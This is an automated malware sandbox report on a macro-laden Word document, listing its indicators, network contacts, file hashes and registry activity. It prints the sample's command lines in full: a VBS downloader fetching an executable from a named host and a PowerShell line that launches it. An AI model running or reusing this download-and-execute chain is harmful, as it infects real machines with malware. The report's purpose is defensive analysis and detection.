30ecfa4d51114c6b273d6de314ce9f56
This report is generated from a file or URL submitted to this webservice on March 11th 2020 22:28:32 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 23 domains and 2 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
External Systems
-
Sample was identified as malicious by a trusted Antivirus engine
- details
- No specific details available
- source
- External System
- relevance
- 5/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 7/62 Antivirus vendors marked sample as malicious (11% detection rate)
- source
- External System
- relevance
- 8/10
-
Sample was identified as malicious by a trusted Antivirus engine
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /assets/plugins/bootstrap-wizard/system_x64.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: secure.zenithglobalplc.com" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "198.54.126.167": ...
URL: https://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe (AV positives: 4/71 scanned on 03/11/2020 22:00:42)
URL: http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe (AV positives: 2/71 scanned on 03/11/2020 21:22:26)
URL: http://loom.gold/ (AV positives: 2/71 scanned on 03/11/2020 18:50:17)
URL: http://sb-svkn.online/ (AV positives: 2/71 scanned on 03/11/2020 18:38:56)
URL: http://mattycash.info/wp-content/cache/page_enhanced/ (AV positives: 2/71 scanned on 03/11/2020 08:44:45)
File SHA256: da550540689b015b44a2e03f37c23ed8c8730ccf9cb611490dc76a39782dce2b (AV positives: 7/72 scanned on 03/11/2020 21:51:49)
File SHA256: a4b183801d7b9d6deb9c9d0cdb87e2826f098d0e8728b27961750f9e279e0a18 (Date: 03/11/2020 21:43:53)
File SHA256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3 (AV positives: 1/74 scanned on 02/26/2020 11:03:21)
File SHA256: a8e65df2958dddac02f2d45995ec036f94299eb9e1a4a51fbfcc717095690ce7 (AV positives: 33/74 scanned on 02/10/2020 11:01:42)
File SHA256: bf07f91e920eb36308dd4d52c6ef053d7c7b8c23712774a2b930e157162e34d1 (AV positives: 33/72 scanned on 08/16/2019 11:06:13)
File SHA256: f5eae177fd3063965daf699a043dde7bae33ff9b76a7fedb3ae928c1c3155315 (AV positives: 41/66 scanned on 08/11/2019 17:40:07)
File SHA256: a4c7adcbeccd9022cd753b97fa24a39080146656695e4b9915a68f78ebcc839c (Date: 01/24/2019 23:25:57)
File SHA256: f2c533a2405bbfb4d89de4fd1384e326895ac724dfb8750afb0acc45b8250831 (Date: 01/12/2019 00:32:06)
File SHA256: f0464bedd28e234a73a0a09187e4899459f7b6d488245986f4d76ff1c9dcd159 (Date: 01/12/2019 00:31:38)
File SHA256: 810a5ee74dd084c359d5323edc675182ecc4908eec9950d5a5fc65176b5d2405 (Date: 01/12/2019 00:23:49) - source
- Network Traffic
- relevance
- 10/10
-
Multiple malicious artifacts seen in the context of different hosts
- details
-
Found malicious artifacts related to "198.54.126.167": ...
URL: https://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe (AV positives: 4/71 scanned on 03/11/2020 22:00:42)
URL: http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe (AV positives: 2/71 scanned on 03/11/2020 21:22:26)
URL: http://loom.gold/ (AV positives: 2/71 scanned on 03/11/2020 18:50:17)
URL: http://sb-svkn.online/ (AV positives: 2/71 scanned on 03/11/2020 18:38:56)
URL: http://mattycash.info/wp-content/cache/page_enhanced/ (AV positives: 2/71 scanned on 03/11/2020 08:44:45)
File SHA256: da550540689b015b44a2e03f37c23ed8c8730ccf9cb611490dc76a39782dce2b (AV positives: 7/72 scanned on 03/11/2020 21:51:49)
File SHA256: a4b183801d7b9d6deb9c9d0cdb87e2826f098d0e8728b27961750f9e279e0a18 (Date: 03/11/2020 21:43:53)
File SHA256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3 (AV positives: 1/74 scanned on 02/26/2020 11:03:21)
File SHA256: a8e65df2958dddac02f2d45995ec036f94299eb9e1a4a51fbfcc717095690ce7 (AV positives: 33/74 scanned on 02/10/2020 11:01:42)
File SHA256: bf07f91e920eb36308dd4d52c6ef053d7c7b8c23712774a2b930e157162e34d1 (AV positives: 33/72 scanned on 08/16/2019 11:06:13)
File SHA256: f5eae177fd3063965daf699a043dde7bae33ff9b76a7fedb3ae928c1c3155315 (AV positives: 41/66 scanned on 08/11/2019 17:40:07)
File SHA256: a4c7adcbeccd9022cd753b97fa24a39080146656695e4b9915a68f78ebcc839c (Date: 01/24/2019 23:25:57)
File SHA256: f2c533a2405bbfb4d89de4fd1384e326895ac724dfb8750afb0acc45b8250831 (Date: 01/12/2019 00:32:06)
File SHA256: f0464bedd28e234a73a0a09187e4899459f7b6d488245986f4d76ff1c9dcd159 (Date: 01/12/2019 00:31:38)
File SHA256: 810a5ee74dd084c359d5323edc675182ecc4908eec9950d5a5fc65176b5d2405 (Date: 01/12/2019 00:23:49) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\30ecfa4d51114c6b273d6de314ce9f56.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "/c C:\MyImages\presskey.cmd" (Show Process)
Spawned process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe" (Show Process)
Spawned process "powershell.exe" with commandline "powershell -C Sleep -s 3;Saps 'C:\MyImages\Louu6hbte.exe'" (Show Process)
Spawned process "TRACERT.EXE" with commandline "TRACERT chiark.greenend.org.uk" (Show Process)
Spawned process "NETSTAT.EXE" (Show Process)
Spawned process "fc.exe" with commandline "fc C:\MyImages\Louu6hbte.exe C:\MyImages\tlofgkkjl15g5k.vbs" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 11
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO TLS Handshake Failure" (SID: 2029340, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
2/71 reputation engines marked "http://secure.zenithglobalplc.com" as malicious (2% detection rate)
4/71 reputation engines marked "https://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe" as malicious (5% detection rate)
2/71 reputation engines marked "http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe" as malicious (2% detection rate) - source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "zx2jmf@3lkq.v"
Pattern match: "2d@k2.jcb"
Pattern match: "r@yj.z_e"
Pattern match: "x@u5.mw6fg" - source
- File/Memory
- relevance
- 3/10
- ATT&CK ID
- T1114 (Show technique in the MITRE ATT&CK™ matrix)
-
Found a potential E-Mail address in binary/memory
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Executes a visual basic script
-
Network Related
-
Found potential IP address in binary/memory
- details
-
Heuristic match: "112.240.168.192.in-addr.arpa"
Heuristic match: "113.240.168.192.in-addr.arpa"
Heuristic match: "161.12.124.64.in-addr.arpa"
Heuristic match: "18.29.125.64.in-addr.arpa"
Heuristic match: "183.85.36.23.in-addr.arpa"
Heuristic match: "2.240.168.192.in-addr.arpa"
Heuristic match: "21.25.125.64.in-addr.arpa"
Heuristic match: "218.31.125.64.in-addr.arpa"
Heuristic match: "229.197.13.212.in-addr.arpa"
Heuristic match: "230.30.125.64.in-addr.arpa"
Heuristic match: "231.240.168.192.in-addr.arpa"
Heuristic match: "232.240.168.192.in-addr.arpa"
Heuristic match: "237.30.125.64.in-addr.arpa"
Heuristic match: "239.169.153.194.in-addr.arpa"
Heuristic match: "34.224.66.195.in-addr.arpa"
Heuristic match: "53.30.125.64.in-addr.arpa"
Heuristic match: "70.169.153.194.in-addr.arpa"
Heuristic match: "79.169.153.194.in-addr.arpa" - source
- File/Memory
- relevance
- 3/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 198.54.126.167 on port 80 is sent without HTTP header
TCP traffic to 198.54.126.167 on port 443 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
System Security
-
References security related windows services
- details
- "mpssvc" (Indicator: "mpssvc")
- source
- File/Memory
- relevance
- 7/10
- ATT&CK ID
- T1044 (Show technique in the MITRE ATT&CK™ matrix)
-
References security related windows services
-
Unusual Characteristics
-
Contains embedded VBA macros with interesting strings
- details
-
Found pattern type "Executable file name" with value: "presskey.cmd"
Found pattern type "Executable file name" with value: "presskey.jse"
Found pattern type "Executable file name" with value: "presskey2.cmd" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Output" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Print #" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "SW_HIDE" which indicates: "May hide the application"
Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "Kill" which indicates: "May delete a file" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros with interesting strings
-
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 25
-
Environment Awareness
-
Queries the installation properties of user installed products
- details
-
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119210000000000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109C20090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109F100A0C00000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109B10090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109910090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\000041091A0090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109F10090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109F100C0400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109A10090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109610090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109810090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109511090400000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109E60090400000000000F01FEC\INSTALLPROPERTIES") - source
- Registry Access
- relevance
- 10/10
-
Reads the registry for installed applications
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ONEDRIVESETUP.EXE")
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{1BB10B8C-6E63-4897-9FB2-3873CE30D7E1}")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\7-ZIP")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE AIR")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER ACTIVEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE SHOCKWAVE PLAYER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\HAANSOFT HOFFICE 80 KOREAN")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries the installation properties of user installed products
-
General
-
Contacts domains
- details
-
"secure.zenithglobalplc.com"
"112.240.168.192.in-addr.arpa"
"113.240.168.192.in-addr.arpa"
"161.12.124.64.in-addr.arpa"
"18.29.125.64.in-addr.arpa"
"183.85.36.23.in-addr.arpa"
"2.240.168.192.in-addr.arpa"
"21.25.125.64.in-addr.arpa"
"218.31.125.64.in-addr.arpa"
"229.197.13.212.in-addr.arpa"
"230.30.125.64.in-addr.arpa"
"231.240.168.192.in-addr.arpa"
"232.240.168.192.in-addr.arpa"
"237.30.125.64.in-addr.arpa"
"239.169.153.194.in-addr.arpa"
"34.224.66.195.in-addr.arpa"
"5.2.5.d.b.b.2.d.9.1.4.1.7.8.d.a.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa"
"53.30.125.64.in-addr.arpa"
"70.169.153.194.in-addr.arpa"
"79.169.153.194.in-addr.arpa" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"198.54.126.167:80"
"198.54.126.167:443" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
- details too long to display
- source
- Static Parser
- relevance
- 10/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex"
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer"
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer"
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer"
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1024.db!dfMaintainer"
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer"
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit"
"\Sessions\1\BaseNamedObjects\Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs"
"\Sessions\1\BaseNamedObjects\Local\Shell.CMruPidlList"
"Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1024.db!dfMaintainer"
"Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs"
"Local\Shell.CMruPidlList"
"Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer"
"Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer"
"Local\ZonesCacheCounterMutex"
"Local\SHResolveLibrary:C:/Users/%OSUSER%/AppData/Roaming/Microsoft/Windows/Libraries/Documents.library-ms"
"Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer"
"Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!17a880"
"Global\C::Users:%OSUSER%:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
-
Antivirus vendors marked dropped file "~_ecfa4d51114c6b273d6de314ce9f56.doc" as clean (type is "data")
Antivirus vendors marked dropped file "~_py_of_30ecfa4d51114c6b273d6de314ce9f56.docx" as clean (type is "data") - source
- Binary File
- relevance
- 10/10
-
Launches a VBS file
- details
- Process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6B2E0000
- source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 5E150000
- source
- Loaded Module
-
Opened the service control manager
- details
-
"WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"WINWORD.EXE" called "OpenSCManager" requesting access rights "0X0"
"WINWORD.EXE" called "OpenSCManager" requesting access rights "0X5"
"WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4) - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
Overview of unique CLSIDs touched in registry
- details
-
"WINWORD.EXE" touched "Thumbnail Cache Class Factory for Out of Proc Server" (Path: "HKCU\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}")
"WINWORD.EXE" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}")
"WINWORD.EXE" touched "HTML Document" (Path: "HKCU\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\IMPLEMENTED CATEGORIES\{00021490-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "IPropertyStore Handler for Images" (Path: "HKCU\CLSID\{A38B883C-1682-497E-97B0-0A3A9E801682}\OVERRIDEFILESYSTEMPROPERTIES")
"WINWORD.EXE" touched "Photo Thumbnail Provider" (Path: "HKCU\CLSID\{C7657C4A-9F68-40FA-A4DF-96BC08EB3551}\INPROCSERVER32")
"WINWORD.EXE" touched "Share Manager" (Path: "HKCU\CLSID\{EDB5F444-CB8D-445A-A523-EC5AB6EA33C7}\TREATAS")
"WINWORD.EXE" touched "Common Places FS Folder" (Path: "HKCU\CLSID\{D34A6CA6-62C2-4C34-8A7C-14709C1AD938}\INPROCSERVER32")
"WINWORD.EXE" touched "Shell File System Folder" (Path: "HKCU\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\INPROCSERVER32")
"WINWORD.EXE" touched "Libraries delegate folder that appears in Users Files Folder" (Path: "HKCU\CLSID\{896664F7-12E1-490F-8782-C0835AFD98FC}\INPROCSERVER32")
"WINWORD.EXE" touched "CLSID_CheckCompositionCycles" (Path: "HKCU\CLSID\{DB6EFB73-5153-43B7-8078-C6FFC4C0238C}\TREATAS")
"WINWORD.EXE" touched "CLSID_GrepWdsResolver" (Path: "HKCU\CLSID\{1C0F439D-7C29-4BDE-8952-4EEB6A49E048}\TREATAS")
"WINWORD.EXE" touched "CLSID_GrepProvider" (Path: "HKCU\CLSID\{1685D4AB-A51B-4AF1-A4E5-CEE87002431D}\INPROCSERVER32")
"WINWORD.EXE" touched "Property System Apartment Class Factory" (Path: "HKCU\CLSID\{9CFC2DF3-6BA3-46EF-A836-E519E81F0EC4}\TREATAS")
"WINWORD.EXE" touched "Property System" (Path: "HKCU\CLSID\{B8967F85-58AE-4F46-9FB2-5D7904798F4B}\TREATAS")
"WINWORD.EXE" touched "Local Thumbnail Cache" (Path: "HKCU\CLSID\{50EF4544-AC9F-4A8E-B21B-8A26180DB13F}\TREATAS")
"WINWORD.EXE" touched "Microsoft Word 97-2003-Dokument" (Path: "HKCU\CLSID\{00020906-0000-0000-C000-000000000046}\IMPLEMENTED CATEGORIES\{00021490-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "Shortcut" (Path: "HKCU\CLSID\{00021401-0000-0000-C000-000000000046}\TREATAS")
"WINWORD.EXE" touched "NetworkListManager" (Path: "HKCU\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TREATAS")
"WINWORD.EXE" touched "Sharing Configuration Manager" (Path: "HKCU\CLSID\{49F371E1-8C5C-4D9C-9A3B-54A6827F513C}\TREATAS")
"WINWORD.EXE" touched "Computers and Devices" (Path: "HKCU\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\INPROCSERVER32") - source
- Registry Access
- relevance
- 3/10
-
Process launched with changed environment
- details
-
Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.B14="4""
Process "cscript.exe" (Show Process) was launched with new environment variables: "PathToVbs="C:\MyImages\tlofgkkjl15g5k.vbs"" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "~ ;")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "'/;")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\3A6BE0"; Key: "3A6BE0")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\3A6BE0")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "L8;")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "<~:")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Runs shell commands
- details
- "/c C:\MyImages\presskey.cmd" on 2020-3-11.23:29:55.326
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/c C:\MyImages\presskey.cmd" (Show Process)
Spawned process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.z ..." (Show Process)
Spawned process "powershell.exe" with commandline "powershell -C Sleep -s 3;Saps 'C:\MyImages\Louu6hbte.exe'" (Show Process)
Spawned process "TRACERT.EXE" with commandline "TRACERT chiark.greenend.org.uk" (Show Process)
Spawned process "NETSTAT.EXE" (Show Process)
Spawned process "fc.exe" with commandline "fc C:\MyImages\Louu6hbte.exe C:\MyImages\tlofgkkjl15g5k.vbs" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1440)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\cscript.exe", Handle: 88)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 92)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\TRACERT.EXE", Handle: 88)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\NETSTAT.EXE", Handle: 92)
